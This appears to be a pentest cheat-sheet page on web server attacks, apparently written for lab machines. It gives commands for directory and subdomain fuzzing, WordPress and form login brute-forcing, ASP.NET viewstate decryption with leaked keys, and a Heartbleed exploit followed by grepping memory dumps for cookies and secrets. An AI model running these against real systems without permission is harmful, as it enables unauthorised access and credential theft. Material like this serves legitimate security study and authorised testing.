Web Server

Misc.

Online Decoder

https://conv.darkbyte.ru/

Fingerprint

Port 443
openssl s_client -connect <hostname>:443

Port 80
telnet <IP> 80

Dictionary-Brute Force

Wfuzz

ffuf -u http://192.168.194.22/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -e .php


wfuzz -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1mil-5000.txt --hl 0 http://FUZZ.bart.htb

#Gobuster
gobuster dir --wordlist  directory-list-2.3-medium.txt -u https://<IP> -x php,html,conf,txt -k -r

#Dirsearch [Faster, but not accurate]
python3 dirsearch.py -u http://url.com/ -e php -x 403,404

ffuf

** Custom dictionary file using the information found on forum.bart.htb page.** cewl forum.bart.htb -w bart-dic.txt tr '[:upper:]' '[:lower:]' < bart-dic.txt > bart-dic-lower.txt

wfuzz -c -w fsoc.dic — hs Invalid -d “log=FUZZ&pwd=aaaaa” http://url/page.php

#When using multiple/same wordlists for both params:
wfuzz -c -z file,/fsoc.dic -z file,/root/Documents/MrRobot/fsoc.dic -d “log=FUZZ&pwd=FUZ2Z”

hs : ignore response containing Invalid, h in this instance being hide and s is actually the regex switch in this instance.

Leaked Machine Keys

IIS

https://six2dez.gitbook.io/pentest-book/enumeration/webservices/iis
https://raw.githubusercontent.com/inquisb/miscellaneous/master/ms10-070_check.py
https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/

    AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate  --modifier=CA0B0334 --macdecode -f out.txt

Heartbleed

Reference

xkcd.com
Seancassidy's Blog

Exploitation

Exploit: https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py

nmap --script vuln -oA vuln-scan 10.10.10.79
nmap -sV --script=ssl-heartbleed
#sslscan may not be accurate
sslscan <ip>

#Python 2.7.x
python heartbleed-poc.py 10.10.10.79 -n 10 -q 

#Grep juice
#Interesting Key Value Pairs
pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin
awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin
grep -a "^Cookie:" dump.bin

Vhost Brute Force [ Sub-domain Enum]

wfuzz

Run wfuzzand fuzz the Host HTTP header.
With wfuzz, I’ll always start it without the hiding flag, see what the default response looks like, and then Ctrl-c to kill it, and re-run with a flag to hide the default response.
For the HTTP site --hh 178 (--hh is hide by character length) worked, and --hh 49 on the HTTPS site

wfuzz -c -u http://10.10.10.43/ -H "Host: FUZZ.nineveh.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 178

CMS

Wordpress

wpscan Registered Email : noreply@yamaarr.com
-u : Enumerate users

wpscan -e vp --plugins-detection aggressive --api-token <API>--url <URL> --disable-tls-checks   

#User enum
wfuzz -c -u http://<IP>/wp-login.php -z file,/opt/SecLists/Usernames/Names/names.txt -d "log=FUZZ&pwd=pass&wp-submit=Log+In&redirect_to=http%3A%2F%2Ffunbox.fritz.box%2Fwp-admin%2F&testcookie=1" --hw 308

PreviousFTP NextDNS

Last updated 2 years ago